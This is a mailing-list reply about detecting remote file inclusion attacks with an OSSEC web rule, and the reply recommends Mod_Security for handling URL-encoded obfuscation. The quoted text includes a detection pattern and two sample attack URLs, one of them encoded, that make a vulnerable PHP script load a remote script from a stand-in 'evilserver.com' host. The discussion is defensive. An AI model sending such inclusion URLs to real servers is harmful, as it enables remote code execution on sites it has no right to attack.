[EMAIL PROTECTED] a écrit :
on web_rules.xml (add ~ line 46)
<url>%3A|%2F|:|/</url>
for block as a XSS attack or a SQL attack log type:
http://mywebsite.com/vulnerable_script.php?include=http://evilserver.com/evil_script.txt
http://mywebsite.com/vulnerable_script.php?include=http%3a%2f%2fevilserver.com%2fevil_script.txt
( for block many script kiddy from:
http://www.milw0rm.com/search.php?dong=include )
On that kind of problematic (obfuscation) might I suggest Mod_Security
(http://www.modsecurity.org/) ?
Mod_Security is a module for apache to filter that kind of attack, it
automatically traducts obfuscation to have less filter to work out.
%3a and %2f are not always bad. (some Lotus Domino webserver add them,
as well as cgi proxies).
It will be a pain in the ass to filter any combination of encoding.
And in my opinion, if you use ossec to filter, you are too late...
With mod_security, the attack doesn't even reach the web server.
Just my two cents...
Sioban
